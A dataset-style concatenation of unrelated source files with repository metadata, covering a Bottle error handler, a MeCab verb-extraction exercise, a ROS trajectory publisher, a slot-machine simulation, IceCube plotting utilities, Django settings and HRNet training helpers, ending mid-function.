        run_wsgi_app(bottle.default_app())
    @error(403)
    def Error403(code):
        logging.warning('There was a 403')
        message = 'Get your codes right dude, you caused some error!'
        return template('templates/simple.tpl', body=message)
    @error(404)
    def Error404(code):
        logging.warning('There was a 404')
        message = 'Stop cowboy, what are you trying to find?'
        return template('templates/simple.tpl', body=message)
if __name__=="__main__":
    main()
|
[
"[email protected]"
] | |
a3bc08a2eea2aaf15b870cf2f660a74a25c7333c
|
e79888cd68177e7ec5125270cdc52f888e211e78
|
/kiyuna/chapter04/knock32.py
|
4831c290a1a6a476a9d47fec6053cfb790a309a1
|
[] |
no_license
|
cafenoctua/100knock2019
|
ec259bee27936bdacfe0097d42f23cc7500f0a07
|
88717a78c4290101a021fbe8b4f054f76c9d3fa6
|
refs/heads/master
| 2022-06-22T04:42:03.939373 | 2019-09-03T11:05:19 | 2019-09-03T11:05:19 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 590 |
py
|
'''
32. 動詞の原形
動詞の原形をすべて抽出せよ.
'''
import sys
from knock30 import mecab_into_sentences
def message(text):
    """Write *text* to stderr wrapped in the bright-green ANSI escape codes."""
    print(f"\33[92m{text}\33[0m", file=sys.stderr)
if __name__ == '__main__':
    # Collect the base form of every verb across all parsed sentences.
    tgt = '動詞'
    res = []
    for sentence in mecab_into_sentences():
        # Not memory-friendly, but keeps the nesting shallow.
        res.extend([d['base'] for d in sentence if d['pos'] == tgt])
    message(f'{tgt}の原形の数: {len(res)}')
    message(f'{tgt}の原形の種類: {len(set(res))}')
    print('上から10個 ->', *res[:10])
|
[
"[email protected]"
] | |
828e05d68fa7676fef57ac1f7c5ee4227f6f8f37
|
3ba03246e8ddf25b4f7607d072efad7dfdeb7a85
|
/cbf_control/src/main.py
|
59213d3470510c8c3ce432c023ab31f43e3a16c0
|
[] |
no_license
|
Jaroan/PR2_CBF
|
c1961c928547cd685e8c7c46452c6c2639764dce
|
22b644d1462363bf3594cfe22e6069f22f9931e1
|
refs/heads/master
| 2021-10-08T16:57:03.671254 | 2018-12-15T04:01:31 | 2018-12-15T04:01:41 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,032 |
py
|
import rospy
from std_msgs.msg import Float32MultiArray, MultiArrayDimension
import time
from optimizer import Optimizer
def forward_kinematics_func(q):
    # NOTE(review): `GetFK` is not imported anywhere in this file, so calling
    # this raises NameError — confirm the intended import. `resp` is computed
    # but never returned or used.
    gfk = GetFK('l_wrist_roll_link', 'base_link')
    resp = gfk.get_current_fk(q)
def publisher():
    """Publish a fixed two-point, 7-joint trajectory once on /trajectory."""
    rospy.init_node('trajectory')
    pub = rospy.Publisher('trajectory', Float32MultiArray, queue_size=1)
    rate = rospy.Rate(100)
    num_points = 2
    # Flat Float32MultiArray laid out as (points x joints).
    t = Float32MultiArray()
    t.layout.dim.append(MultiArrayDimension(
        size=num_points, stride=num_points*7, label="points"))
    t.layout.dim.append(MultiArrayDimension(size=7, stride=7, label="joints"))
    t.layout.data_offset = 0
    t.data = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
              -0.7853981633974483, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
    print(t)
    # while not rospy.is_shutdown():
    #     pub.publish(t)
    #     rate.sleep()
    # Give subscribers time to connect before the single publish.
    time.sleep(3)
    pub.publish(t)
if __name__ == '__main__':
    try:
        publisher()
    except rospy.ROSInterruptException:
        pass
|
[
"[email protected]"
] | |
cebb283734b02844e2039ccc368112a270cb896b
|
c39e466c2b6fdffbc410f24669f214e13fb87781
|
/PYTHON/TEMA 4/Unit4_examples/Unit4_Functions_example1.py
|
61c8f70816785dcaa93e7f65f5fccf3266b2d112
|
[] |
no_license
|
enanibus/biopython
|
3a58efbcc92f1ce60285a115c620de9295b7d281
|
613d334a5c0502059930d9381a9464ef533cca1c
|
refs/heads/master
| 2021-01-12T17:27:39.516793 | 2017-01-02T18:30:09 | 2017-01-02T18:30:09 | 71,573,732 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 256 |
py
|
def Media(NumberList):
    """Return the arithmetic mean of the numbers in *NumberList*.

    Raises ZeroDivisionError for an empty list (same as the original).
    """
    # Built-in sum() replaces the manual accumulation loop.
    return sum(NumberList) / len(NumberList)
# Demo: mean weight of a ten-person sample.
Weight4Bq=[70,47,68,56,87,49,48,71,65,62]
AverageWeight4Bq=Media(Weight4Bq)
print(AverageWeight4Bq)
|
[
"[email protected]"
] | |
9222ee7ff2fb1829be3106e311fbfe64e0ed86d0
|
96b4b1339e745fe15d898f301a65a002898d7a70
|
/Project4/alt_solns/Final/prob1_sim.py
|
442a9b5c20ac3a839a9ce36852de8c5ff993d629
|
[] |
no_license
|
abusa1101/AI-coding-problems
|
8ace849ec236a059278d684bba644471f99d1979
|
d4bfa45ddc2fa1aecbf15161fcea4cb92db8dec1
|
refs/heads/master
| 2023-08-25T19:28:56.851217 | 2021-10-06T20:39:51 | 2021-10-06T20:39:51 | 235,749,527 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,318 |
py
|
import random as rd
def simulate_slots():
    """Play a 10-coin slot machine until broke; return the number of plays.

    Each play costs one coin and spins three wheels drawn uniformly from the
    same 8-symbol reel. Payouts: one coin per leading cherry (up to 3), and
    20/15/5 coins for a triple bar/bell/lemon. Identical odds and RNG call
    sequence to the original implementation.
    """
    coins = 10
    plays = 0
    while coins:
        coins -= 1
        plays += 1
        reel = ["bar", "bell", "lemon", "cherry", "blank", "blank", "blank", "blank"]
        spin = [rd.choice(reel) for _ in range(3)]
        first, second, third = spin
        if first == "cherry":
            # One coin per cherry from the left.
            if first == second:
                coins += 3 if second == third else 2
            else:
                coins += 1
        elif first == second == third:
            # Triple payout; blank triples pay nothing.
            coins += {"bar": 20, "bell": 15, "lemon": 5}.get(first, 0)
    return plays
# Run the simulation many times and report mean and median play counts.
TRIES = 10000
VAL = []
for x in range(TRIES):
    VAL.append(simulate_slots())
MEAN = sum(VAL) / float(TRIES)
N = len(VAL)
VAL.sort()
# Median: average the two middle values for an even sample size.
if N % 2 == 0:
    MEDIAN1 = VAL[N//2]
    MEDIAN2 = VAL[N//2 - 1]
    MEDIAN = (MEDIAN1 + MEDIAN2)/2
else:
    MEDIAN = VAL[N//2]
print("Tries, Mean, Median: %s, %s, %s" % (TRIES, MEAN, MEDIAN))
|
[
"[email protected]"
] | |
7455a9c2dc2c361c1d554d1309ffd459284caa46
|
fb3ff12389925480a19b11e6bb51ea760b7af729
|
/chat2.py
|
23914506991017343a3779cb057d01b0ca95d14a
|
[] |
no_license
|
sd8917/web_project
|
60a353a2bc24600a183a9653765612c5809e9634
|
18228db4980aa7733f2d668d1cb8201df13ec493
|
refs/heads/master
| 2020-03-31T20:53:06.384469 | 2018-10-11T09:09:12 | 2018-10-11T09:09:12 | 152,559,275 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 262 |
py
|
import socket
# Minimal TCP chat client: connect to a server on this host and alternate
# receiving a message and sending a prompted reply, forever.
s = socket.socket()
host = socket .gethostname()
port = 12345
s.connect((host,port))
while True:
    # NOTE(review): str(bytes) then stripping 'b' and quotes is a fragile way
    # to decode — it mangles any payload containing those characters; consider
    # s.recv(1024).decode() instead.
    data = str(s.recv(1024)).strip('b').strip('\'')
    print(data)
    messg = bytes("sudhanshu : " + input(r""),encoding='utf-8')
    s.send(messg)
|
[
"[email protected]"
] | |
8743f7c223895996eeda93730b3d1d86d7246f5b
|
e0feac125fb92c3d1834f9c9c89baf4ab9428fc6
|
/steamshovel/python/artists/util.py
|
e2aeaf201e5848791815adc40ec69406a701c41d
|
[
"BSD-2-Clause"
] |
permissive
|
AlexHarn/bfrv1_icetray
|
e6b04d04694376488cec93bb4b2d649734ae8344
|
91f939afecf4a9297999b022cea807dea407abe9
|
refs/heads/master
| 2022-12-04T13:35:02.495569 | 2020-08-27T22:14:40 | 2020-08-27T22:14:40 | 275,841,407 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 12,732 |
py
|
import math
import re
from icecube.shovelart import Vec3dList, vec3d
from icecube import dataclasses
from icecube import icetray
I3Units = icetray.I3Units
# imports may not fail, since util is used by everybody
try: import numpy as np
except ImportError: pass
try:
from matplotlib import patches as mpatches
from matplotlib import transforms as mtransforms
except ImportError:
pass
# CamelCase because it behaves like a class
def TankPositionGenerator(geometry):
    """
    Returns the OMKeys and positions of IceTop tanks.

    Yields (OMKey, position) pairs; each tank contributes both of its DOMs
    with the same tank position.
    """
    # for omkey, geo in geometry.omgeo:
    #     if 60 < omkey.om < 65:
    #         yield omkey, geo.position
    for station in geometry.stationgeo.values():
        for tank in station:
            yield tank.omkey_list[0], tank.position
            yield tank.omkey_list[1], tank.position
def parse_engineering(string, unit=""):
    """
    Parse a number written in engineering notation (k, M, m, ...).

    :param string: string to parse, e.g. "4.7 k"
    :param unit: unit to expect; ValueError is raised if it is missing
    :returns: parsed float

    Use u for micro. We cannot parse the mu sign since
    we are limited to ASCII.
    """
    if not string.endswith(unit):
        raise ValueError("string '%s' is missing the unit '%s'" % (string, unit))
    body = string[:-len(unit)] if unit else string
    match = re.match(r"\s*([\+\-]?[.0-9]+)\s*([a-zA-Z]*)\s*", body)
    if match is None:
        raise ValueError("string '%s' cannot be parsed" % body)
    # SI prefix -> multiplier (unknown prefixes raise KeyError, as before).
    scale = {'a': 1e-18, 'f': 1e-15, 'p': 1e-12, 'n': 1e-9, 'u': 1e-6,
             'm': 1e-3, 'c': 1e-2, 'd': 1e-1, '': 1.0, 'k': 1e3,
             'M': 1e6, 'G': 1e9, 'T': 1e12, 'P': 1e15, 'E': 1e18}
    return float(match.group(1)) * scale[match.group(2)]
def format_engineering(number, unit=""):
    """
    Writes a string in engineering notation (k, M, m, ...).

    :param number: number to format
    :param unit: optional unit string to append
    :returns: formatted string

    Should be the inverse of parse_engineering(...).
    """
    if math.isnan(number):
        return "nan"
    if number == 0.0:
        # BUG FIX: the original returned the *int* 0 here, breaking the
        # documented contract of always returning a string.
        return "0"
    convert_table = {-18: 'a', -15: 'f', -12: 'p', -9: 'n', -6: 'u',
                     -3: 'm', -2: 'c', -1: 'd', 0: '', 3: 'k',
                     6: 'M', 9: 'G', 12: 'T', 15: 'P', 18: 'E'}
    ten_exp = int(math.log10(abs(number)))
    # Snap the exponent to a multiple of 3 (truncating toward zero, as before).
    sci_places = int(ten_exp / 3) * 3
    expo_char = convert_table[sci_places]
    trailing = number / 10.0 ** sci_places
    # Keep roughly three significant characters in the mantissa.
    if trailing >= 10:
        lead = "{:d}".format(int(round(trailing)))
    elif trailing >= 1:
        lead = "{:.1f}".format(trailing)
    else:
        lead = "{:.2f}".format(trailing)
    return lead + " " + expo_char + unit
def detector_outline( bottom_vec3d_list, top_vec3d_list ):
    """
    Returns detector outline by detecting points at the border.
    Only works for standard hexagon grid.

    :param bottom_vec3d_list: per-string bottom positions
    :param top_vec3d_list: per-string top positions (paired by index)
    :returns: (bottom, top) Vec3dLists containing only the corner strings
    """
    # hardcoded angular offset for hexagon
    phi0 = -20.0 * I3Units.degree
    # hardcoded threshold for an edge
    cos_angle_threshold = math.cos( 7.0 * I3Units.degree )
    bottom = Vec3dList()
    top = Vec3dList()
    string_coords = []
    for b, t in zip( bottom_vec3d_list, top_vec3d_list ):
        if t[2] < 450.0 * I3Units.meter: # ignore deep-core
            continue
        # (azimuth, x, y, z_bottom, z_top); azimuth first so sort() below
        # orders the border points circularly.
        string_coords.append(( math.atan2(t[1], t[0]),
                               t[0], t[1], b[2], t[2] ))
    # border detection:
    # check if there is a point in each angular segment of hexagon
    border = []
    for i, cur in enumerate( string_coords ):
        counts = [False, False, False, False, False , False]
        for j, other in enumerate( string_coords ):
            if i == j: continue
            dx = cur[1] - other[1]
            dy = cur[2] - other[2]
            phi = int((math.atan2( dy, dx ) - phi0) / I3Units.degree)
            if phi < 0:
                phi += 360
            counts[phi // 60] = True
        neighbor_count = sum( counts )
        # border points don't have a full hexagon of neighbors
        if neighbor_count < 6:
            border.append( cur )
    border.sort() # put in circular order
    # edge detection:
    # check if differential vectors of three consecutive points have an angle
    for i in range( len(border) ):
        ax = border[i - 1][1] - border[i - 2][1]
        ay = border[i - 1][2] - border[i - 2][2]
        bx = border[i][1] - border[i - 1][1]
        by = border[i][2] - border[i - 1][2]
        anorm = (ax ** 2 + ay ** 2) ** 0.5
        bnorm = (bx ** 2 + by ** 2) ** 0.5
        cos_angle = (bx * ax + by * ay) / (anorm * bnorm)
        if cos_angle < cos_angle_threshold:
            # Direction changed: border[i-1] is a corner of the hexagon.
            cur = border[i - 1]
            bottom.append( vec3d(cur[1], cur[2], cur[3]) )
            top.append( vec3d(cur[1], cur[2], cur[4]) )
    return bottom, top
def particle_pos(particle, time):
    """
    Returns the position of a particle at the given time.
    """
    # Straight-line extrapolation from the particle's own reference time.
    return particle.pos + particle.dir * particle.speed * (time - particle.time)
def to_shower_cs(i3direction):
    """
    Returns rotation matrix to shower CS for given i3direction.
    Requires numpy.

    :param i3direction: direction-like object exposing .phi and .theta
    :returns: 3x3 numpy matrix (theta rotation composed after phi rotation)
    """
    sin_p, cos_p = math.sin(i3direction.phi), math.cos(i3direction.phi)
    sin_t, cos_t = math.sin(i3direction.theta), math.cos(i3direction.theta)
    # counter-clockwise (pi + phi) rotation
    rot_phi = np.matrix([[-cos_p, -sin_p, 0],
                         [sin_p, -cos_p, 0],
                         [0, 0, 1]])
    # clock-wise (pi - theta) rotation
    rot_theta = np.matrix([[-cos_t, 0, -sin_t],
                           [0, 1, 0],
                           [sin_t, 0, -cos_t]])
    return rot_theta * rot_phi
def signed_r_z(rotation_matrix, positions, core):
    """
    Returns signed lateral distance with r > 0 as early and r < 0 as late hits.
    For the rotation matrix, use to_shower_cs(...).
    Requires numpy.
    """
    # Shift into the core frame, then rotate into the shower CS.
    shifted = np.array(positions) - core
    rotated = np.array(rotation_matrix * shifted.T).T
    x_cs = rotated[:, 0].T
    y_cs = rotated[:, 1].T
    z_cs = rotated[:, 2].T
    # Lateral distance, signed by the (negated) shower-CS x coordinate.
    lateral = (x_cs ** 2 + y_cs ** 2) ** 0.5 * np.sign(-x_cs)
    return lateral, z_cs
def propagate_covariance(f, x, cov):
    """
    Computes the covariance matrix of y for the transformation y = f(x),
    given x with covariance matrix cov.
    Requires numpy.
    :param f: function-like, has to be callable as f(x)
    :param x: array-like, vector of parameters
    :param cov: 2-d array of floats, covariance matrix of x
    :returns: fcov: matrix of floats, covariance matrix of the output of f
    Examples:
    >>> import numpy as np
    >>> v = np.ones(2)
    >>> cov = np.ones((2,2))
    >>> def f(r):return np.dot(r,r)
    >>> "%.3g" % propagate_covariance(f,v,cov)
    '16'
    >>> def f(r):return 2*r
    >>> propagate_covariance(f,v,cov)
    array([[ 4.,  4.],
           [ 4.,  4.]])
    Authors:
        Hans Dembinski <[email protected]>
    """
    ncol = len(x)  # (unused; kept as in the original)
    diag = np.diag(cov)
    # Step widths: 1e-3 of each parameter's sigma; fall back to 1e-6 for
    # zero-variance parameters so the central difference stays defined.
    dx = diag ** 0.5 * 1e-3
    dx[diag == 0] = 1e-6
    jacobi = jacobian(f, x, dx)
    # Linear error propagation: cov_y = J cov_x J^T.
    return np.dot(jacobi, np.dot(cov, jacobi.T))
def jacobian(f, x, dx):
    """
    Numerically calculate matrix of first derivatives (central differences).
    Needed for error propagation.
    Requires numpy.
    :param f: function-like, has to be callable as f(x)
    :param x: array-like, vector of parameters
    :param dx: array-like, step widths for the central-difference approximation
        (DOC FIX: the original documented a non-existent optional ``steps``
        parameter and its examples called jacobian with only two arguments,
        which raises TypeError.)
    :returns: Jacobi matrix of first derivatives, shape (len(f(x)), len(x))
    Examples:
    >>> def f(v): return 0.5*np.dot(v,v)
    >>> jacobian(f, np.ones(2), 1e-3*np.ones(2))
    array([[1., 1.]])
    Authors:
        Hans Dembinski <[email protected]>
    """
    x = np.atleast_1d(x)
    dx = np.atleast_1d(dx)
    nx = len(x)
    jacobi = None
    e = np.zeros(nx)
    for ix in range(nx):
        # Unit vector along coordinate ix, reusing the same buffer.
        e *= 0
        e[ix] = 1
        # Central difference: (f(x + h) - f(x - h)) / (2 h).
        deriv = np.atleast_1d((f(x + e * dx) - f(x - e * dx)) / (2 * dx[ix]))
        if ix == 0:
            # Output dimension is only known after the first evaluation.
            jacobi = np.empty((len(deriv), nx))
        jacobi[:, ix] = deriv
    return jacobi
def cornertext(text, loc=2, color=None, frameon=False,
               axes=None, borderpad=None, borderaxespad=None, handletextpad=None,
               **kwargs):
    """
    Conveniently places text in a corner of an MPL plot. Mimics pyplot.legend(...).
    Requires matplotlib.

    :param text: string or tuple of strings
        Text to be placed in the plot. May be a tuple of strings to get
        several lines of text.
    :param loc: integer or string
        Location of text, same as in legend(...).
    :param color: string or tuple of strings (optional)
        Color per line; a single string (or None) applies to every line.
    :param frameon: boolean (optional)
        Whether to draw a border around the text. Default is False.
    :param axes: Axes (optional, default: None)
        Axes object which houses the text (defaults to the current axes).

    Other keyword arguments are forwarded to the text instance.

    Authors:
        Hans Dembinski <[email protected]>
    """
    from matplotlib.offsetbox import AnchoredOffsetbox, VPacker, TextArea
    from matplotlib import rcParams
    from matplotlib.font_manager import FontProperties
    import warnings
    if axes is None:
        from matplotlib import pyplot as plt
        axes = plt.gca()
    # String -> legend location code, mirroring pyplot.legend's mapping.
    locTranslate = {
        'upper right': 1,
        'upper left': 2,
        'lower left': 3,
        'lower right': 4,
        'right': 5,
        'center left': 6,
        'center right': 7,
        'lower center': 8,
        'upper center': 9,
        'center': 10
    }
    if isinstance(loc, str):
        if loc in locTranslate:
            loc = locTranslate[loc]
        else:
            message = ('Unrecognized location "%s". '
                       'Falling back on "upper left"; '
                       'valid locations are\n\t%s') \
                       % (loc, '\n\t'.join(locTranslate.keys()))
            warnings.warn(message)
            loc = 2
    # Padding defaults come from the legend rcParams so the text box lines
    # up visually with a legend in the same figure.
    if borderpad is None:
        borderpad = rcParams["legend.borderpad"]
    if borderaxespad is None:
        borderaxespad = rcParams["legend.borderaxespad"]
    if handletextpad is None:
        handletextpad = rcParams["legend.handletextpad"]
    # Accept either an explicit fontproperties object or size/fontsize kwargs.
    if "fontproperties" in kwargs:
        fontproperties = kwargs["fontproperties"]
        del kwargs["fontproperties"]
    else:
        if "size" in kwargs:
            size = kwargs["size"]
            del kwargs["size"]
        elif "fontsize" in kwargs:
            size = kwargs["fontsize"]
            del kwargs["fontsize"]
        else:
            size = rcParams["legend.fontsize"]
        fontproperties = FontProperties(size=size)
    # Normalize to one text (and one color) per line.
    texts = [text] if isinstance(text, str) else text
    colors = [color for t in texts] if (
        isinstance(color, str) or color is None) else color
    tas = []
    for t, c in zip(texts, colors):
        ta = TextArea(t,
                      textprops={"color": c,
                                 "fontproperties": fontproperties},
                      multilinebaseline=True,
                      minimumdescent=True,
                      **kwargs)
        tas.append(ta)
    # Stack the lines vertically and anchor the box at the requested corner.
    vpack = VPacker(children=tas, pad=0, sep=handletextpad)
    aob = AnchoredOffsetbox(loc, child=vpack,
                            pad=borderpad,
                            borderpad=borderaxespad,
                            frameon=frameon)
    axes.add_artist(aob)
    return aob
def mpl_hist(x, y, **kwargs):
    """Return a matplotlib Polygon tracing a step histogram.

    :param x: bin edges (length m+1)
    :param y: bin contents (length m)
    :param kwargs: forwarded to matplotlib.patches.Polygon
    """
    m = len(y)
    # Two points per bin (top-left, top-right) plus one anchor at each end.
    n = 2 * m + 2
    xy = np.zeros((n, 2))
    xy[0][0] = x[0]
    xy[-1][0] = x[-1]
    for i in range(m):
        xy[1 + 2 * i][0] = x[i]
        xy[1 + 2 * i][1] = y[i]
        xy[1 + 2 * i + 1][0] = x[i + 1]
        xy[1 + 2 * i + 1][1] = y[i]
    return mpatches.Polygon(xy, **kwargs)
def rainbow_text(axes, x, y, strings, colors, **kwargs):
    """
    Draws a sequence of strings in various colors.
    Based on http://stackoverflow.com/questions/9169052.

    :param strings: text fragments drawn left to right starting at (x, y)
    :param colors: one color per fragment
    :param kwargs: forwarded to axes.text; may include a `fontweights`
        sequence (one weight per fragment), which is consumed here
    """
    fontweights = None
    if "fontweights" in kwargs:
        fontweights = kwargs["fontweights"]
        del kwargs["fontweights"]
    renderer = axes.figure.canvas.get_renderer()
    for i, s in enumerate(strings):
        kwargs["color"] = colors[i]
        if fontweights is not None:
            kwargs["fontweight"] = fontweights[i]
        tx = axes.text(x, y, s, **kwargs)
        # Draw now so the rendered extent is known, then shift the next
        # fragment right by this fragment's width.
        tx.draw(renderer)
        ex = tx.get_window_extent()
        kwargs["transform"] = mtransforms.offset_copy(tx._transform,
                                                      x=ex.width,
                                                      units='dots')
|
[
"[email protected]"
] | |
c0554377c598e57e3369a03fa8b9b79338b3e0c2
|
c76779dd4682cdf252623a193d735a8893e872f2
|
/gs119/gs119/settings.py
|
457eec650ae398373a531687421cc1ce5ef40e84
|
[] |
no_license
|
sailendrachettri/learning-django
|
fef240aa19303d876f760a5641d9d15b2716b61b
|
3c413628f0f4a3a560fa5c56a5228260c50e0230
|
refs/heads/main
| 2023-03-28T22:18:24.620614 | 2021-04-10T11:04:40 | 2021-04-10T11:04:40 | 355,099,833 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,073 |
py
|
"""
Django settings for gs119 project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): the key is committed in source — move it to an environment
# variable before any production deployment.
SECRET_KEY = 'mdulujvt3&wlt7s%xfwe!q1g&n+y8k)o(vqeygx3-ld0g-26k3'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'school',  # project app
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'gs119.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'gs119.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BASE_DIR / 'db.sqlite3',
    }
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
|
[
"[email protected]"
] | |
459a5c19a5b75157ec9aa8f5eef3223c4ec4fba3
|
a63e24d4d6521e98e1b79c2528ab6f08d5add66c
|
/kps2d_detection/hr_net/lib/utils/utils.py
|
9561baa3f456005004fd3a5a38d49dcc505e5f43
|
[
"MIT"
] |
permissive
|
abrichr/cvToolkit
|
7d3f2e593d3132aae8c519c024383b0f269eeda6
|
7f559138c27fedf9e3e3929cd4d6e4f8198d4c51
|
refs/heads/master
| 2022-07-19T00:45:52.036959 | 2020-05-26T06:02:24 | 2020-05-26T06:02:24 | 266,943,746 | 0 | 0 |
MIT
| 2020-05-26T04:24:25 | 2020-05-26T04:24:25 | null |
UTF-8
|
Python
| false | false | 7,023 |
py
|
# ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# Written by Bin Xiao ([email protected])
# ------------------------------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import logging
import time
from collections import namedtuple
from pathlib import Path
import torch
import torch.optim as optim
import torch.nn as nn
def create_logger(cfg, cfg_name, phase='train'):
    """Set up file+console logging and create the output directories.

    Directory layout: OUTPUT_DIR/<dataset>/<model>/<cfg_name> for artifacts
    and LOG_DIR/<dataset>/<model>/<cfg_name>_<time> for tensorboard.
    Returns (logger, final_output_dir, tensorboard_log_dir) as strings.
    """
    root_output_dir = Path(cfg.OUTPUT_DIR)
    # set up logger
    if not root_output_dir.exists():
        print('=> creating {}'.format(root_output_dir))
        root_output_dir.mkdir()
    dataset = cfg.DATASET.DATASET + '_' + cfg.DATASET.HYBRID_JOINTS_TYPE \
        if cfg.DATASET.HYBRID_JOINTS_TYPE else cfg.DATASET.DATASET
    # ':' appears in some dataset names but is not filesystem-safe.
    dataset = dataset.replace(':', '_')
    model = cfg.MODEL.NAME
    cfg_name = os.path.basename(cfg_name).split('.')[0]
    final_output_dir = root_output_dir / dataset / model / cfg_name
    print('=> creating {}'.format(final_output_dir))
    final_output_dir.mkdir(parents=True, exist_ok=True)
    time_str = time.strftime('%Y-%m-%d-%H-%M')
    log_file = '{}_{}_{}.log'.format(cfg_name, time_str, phase)
    final_log_file = final_output_dir / log_file
    head = '%(asctime)-15s %(message)s'
    logging.basicConfig(filename=str(final_log_file),
                        format=head)
    logger = logging.getLogger()
    logger.setLevel(logging.INFO)
    # Mirror log records to the console as well as the file.
    console = logging.StreamHandler()
    logging.getLogger('').addHandler(console)
    tensorboard_log_dir = Path(cfg.LOG_DIR) / dataset / model / \
        (cfg_name + '_' + time_str)
    print('=> creating {}'.format(tensorboard_log_dir))
    tensorboard_log_dir.mkdir(parents=True, exist_ok=True)
    return logger, str(final_output_dir), str(tensorboard_log_dir)
def get_optimizer(cfg, model):
    """Build the optimizer named by cfg.TRAIN.OPTIMIZER ('sgd' or 'adam').

    Returns None for any other name, matching the original behavior.
    """
    choice = cfg.TRAIN.OPTIMIZER
    if choice == 'sgd':
        return optim.SGD(
            model.parameters(),
            lr=cfg.TRAIN.LR,
            momentum=cfg.TRAIN.MOMENTUM,
            weight_decay=cfg.TRAIN.WD,
            nesterov=cfg.TRAIN.NESTEROV,
        )
    if choice == 'adam':
        return optim.Adam(
            model.parameters(),
            lr=cfg.TRAIN.LR,
        )
    return None
def save_checkpoint(states, is_best, output_dir,
                    filename='checkpoint.pth'):
    """Write *states* to output_dir/filename; when *is_best*, also snapshot
    the best weights to model_best.pth."""
    torch.save(states, os.path.join(output_dir, filename))
    # NOTE(review): the guard checks for 'state_dict' but saves
    # 'best_state_dict' — confirm both keys always coexist in `states`.
    if is_best and 'state_dict' in states:
        torch.save(states['best_state_dict'],
                   os.path.join(output_dir, 'model_best.pth'))
def get_model_summary(model, *input_tensors, item_length=26, verbose=False):
    """
    Run one forward pass and summarize per-layer shapes, parameters and FLOPs.

    :param model: torch.nn.Module to profile; forward hooks are attached
        to every submodule (except ModuleList/Sequential containers and the
        model itself) and removed after one forward pass.
    :param input_tensors: example inputs forwarded through the model.
    :param item_length: column width used to format the per-layer table.
    :param verbose: if True, include the per-layer table, not just totals.
    :return: the formatted summary string.
    """
    # NOTE(review): this function uses `os.linesep` below, but `os` is not
    # among this module's visible imports — confirm it is imported at file top.
    summary = []

    # One record per executed leaf module.
    ModuleDetails = namedtuple(
        "Layer", ["name", "input_size", "output_size", "num_parameters", "multiply_adds"])
    hooks = []
    # class name -> number of instances seen so far (for unique layer names)
    layer_instances = {}

    def add_hooks(module):

        def hook(module, input, output):
            class_name = str(module.__class__.__name__)

            # Assign a per-class running index so repeated layers get
            # distinct names like Conv2d_1, Conv2d_2, ...
            instance_index = 1
            if class_name not in layer_instances:
                layer_instances[class_name] = instance_index
            else:
                instance_index = layer_instances[class_name] + 1
                layer_instances[class_name] = instance_index

            layer_name = class_name + "_" + str(instance_index)

            # Parameters are counted only for Conv/BatchNorm/Linear layers.
            params = 0

            if class_name.find("Conv") != -1 or class_name.find("BatchNorm") != -1 or \
               class_name.find("Linear") != -1:
                for param_ in module.parameters():
                    params += param_.view(-1).size(0)

            # Multiply-adds: weight-size * output spatial size for convs,
            # output-size * input features for Linear; otherwise unknown.
            flops = "Not Available"
            if class_name.find("Conv") != -1 and hasattr(module, "weight"):
                flops = (
                    torch.prod(
                        torch.LongTensor(list(module.weight.data.size()))) *
                    torch.prod(
                        torch.LongTensor(list(output.size())[2:]))).item()
            elif isinstance(module, nn.Linear):
                flops = (torch.prod(torch.LongTensor(list(output.size()))) \
                         * input[0].size(1)).item()

            # Unwrap list-valued inputs/outputs to their first element.
            if isinstance(input[0], list):
                input = input[0]
            if isinstance(output, list):
                output = output[0]

            summary.append(
                ModuleDetails(
                    name=layer_name,
